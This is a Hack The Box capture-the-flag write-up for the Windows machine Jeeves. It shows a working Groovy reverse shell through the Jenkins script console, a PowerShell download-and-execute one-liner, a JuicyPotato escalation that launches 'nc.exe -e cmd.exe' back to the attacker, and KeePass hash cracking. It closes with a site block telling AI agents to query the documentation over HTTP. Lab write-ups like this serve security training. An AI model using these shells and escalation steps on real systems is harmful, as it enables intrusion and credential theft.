# HTB - Jeeves ![Jeeves](/files/-M2pqsZLZPwj_Iu3NKa7) ## Getting Root: 1. The box is running **`Jenkins version 2.87`** on port 50000 which allows us to get a reverse shell using Groovy 2. There are two methods of getting root. **JuicyPotato** or a **KeePass** database file. ### Tools Used: **`nmap, gobuster, JuicyPotato.exe, keepass2john`** ## Nmap ```bash nmap -sC -sV -p- 10.10.10.63 -oA nmap/Jeeves Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-11 23:30 EDT Nmap scan report for 10.10.10.63 Host is up (0.038s latency). Not shown: 65531 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Ask Jeeves 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Error 404 Not Found Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 5h02m28s, deviation: 0s, median: 5h02m27s |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-03-12T08:34:48 |_ start_date: 2020-03-12T08:30:47 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 153.24 seconds ``` ## Enumeration ### HTTP Port 80 was rabbit hole, but port 50000 had **`Jenkins version 2.87`** running ```bash # gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.63:50000 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/22 23:43:56 Starting gobuster =============================================================== /askjeeves (Status: 302) ``` ## Getting a shell We can use a **Groovy** code to get a reverse shell. ![](/files/-M2BseDmP1dATwHYVF0x) Groovy code I used:\ ![](/files/-M2BsqZIsbyI3fJYidWd) ```groovy String host="10.10.14.3"; int port=9001; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` If you prefer a reverse powershell, you can use the following groovy code. ```bash cmd = """ powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Invoke-PowerShellTcp.ps1') """ println cmd.execute().txt ``` Got a shell ```groovy # rlwrap nc -lnvp 9001 listening on [any] 9001 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.63] 49676 Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Users\Administrator\.jenkins>whoami whoami jeeves\kohsuke C:\Users\Administrator\.jenkins> ``` ## Privilege Escalation There are two methods. 1. **JuicyPotato** token impersonation 2. **KeePass** file with all the creds Systeminfo ```groovy ./windows-exploit-suggester.py -d 2020-03-06-mssb.xls -i jeeves.txt [*] initiating winsploit version 3.3... [*] database file detected as xls or xlsx based on extension [*] attempting to read from the systeminfo input file [+] systeminfo input file read successfully (ascii) [*] querying database file for potential vulnerabilities [*] comparing the 11 hotfix(es) against the 160 potential bulletins(s) with a database of 137 known exploits [*] there are now 160 remaining vulns [+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin [+] windows version identified as 'Windows 10 64-bit' [*] [E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important [*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135) [*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) [*] https://github.com/tinysec/public/tree/master/CVE-2016-7255 [*] [E] MS16-129: Cumulative Security Update for Microsoft Edge (3199057) - Critical [*] https://www.exploit-db.com/exploits/40990/ -- Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution [*] https://github.com/theori-io/chakra-2016-11 [*] [E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important [*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) [*] [M] MS16-075: Security Update for Windows SMB Server (3164038) - Important [*] https://github.com/foxglovesec/RottenPotato [*] https://github.com/Kevin-Robertson/Tater [*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege [*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation [*] [E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important [*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC [*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC [*] [E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical [*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063), PoC [*] [E] MS16-056: Security Update for Windows Journal (3156761) - Critical [*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 Java­Script­Stack­Walker Memory Corruption (MS15-056) [*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 Java­Script­Stack­Walker memory corruption [*] [E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile (3143141) - Important [*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC [*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC [*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#) [*] [M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important [*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF [*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC [*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC [*] [E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important [*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC [*] [E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important [*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC [*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC [*] [E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution (3116162) - Important [*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC [*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll DLL Planting (MS15-134), PoC [*] [E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical [*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112) [*] [E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege (3096447) - Important [*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111), PoC [*] [E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of Privilege (3089657) - Important [*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask TileUserBroker Privilege Escalation, PoC [*] [E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (3089656) - Critical [*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation, PoC [*] https://www.exploit-db.com/exploits/38199/ -- Windows NtUserGetClipboardAccessToken Token Leak, PoC [*] [*] done ``` ### JuicyPotato - Method 1 {% embed url="" %} ```bash PS C:\temp> .\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.14.23 9005" -t * Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 ...... [+] authresult 0 {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK PS C:\temp> PS C:\temp> ``` #### Got a shell as SYSTEM ```bash # rlwrap nc -lnvp 9005 listening on [any] 9005 ... connect to [10.10.14.23] from (UNKNOWN) [10.10.10.63] 49707 Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>hostname hostname Jeeves C:\Windows\system32>systeminfo systeminfo Host Name: JEEVES OS Name: Microsoft Windows 10 Pro OS Version: 10.0.10586 N/A Build 10586 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00331-20304-47406-AA297 Original Install Date: 10/25/2017, 4:45:33 PM System Boot Time: 3/23/2020, 4:43:09 AM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 2,047 MB Available Physical Memory: 1,160 MB Virtual Memory: Max Size: 2,687 MB Virtual Memory: Available: 1,715 MB Virtual Memory: In Use: 972 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 10 Hotfix(s) Installed. [01]: KB3150513 [02]: KB3161102 [03]: KB3172729 [04]: KB3173428 [05]: KB4021702 [06]: KB4022633 [07]: KB4033631 [08]: KB4035632 [09]: KB4051613 [10]: KB4041689 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) 82574L Gigabit Network Connection Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.63 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. ``` ### KeePass - Method 2 ```bash PS C:\users\kohsuke> ls Documents Directory: C:\users\kohsuke\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/18/2017 1:43 PM 2846 CEH.kdbx PS C:\users\kohsuke> ``` #### Cracking Keepass ```bash # keepass2john CEH.kdbx > CEHhash # john --wordlist=/root/HackTheBox/rockyou.txt CEHhash Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 6000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status moonshine1 (CEH) 1g 0:00:00:28 DONE (2020-03-12 01:48) 0.03471g/s 1908p/s 1908c/s 1908C/s nando1..moonshine1 Use the "--show" option to display all of the cracked passwords reliably Session completed ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/htb-writeups/writeups/htb-jeeves.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.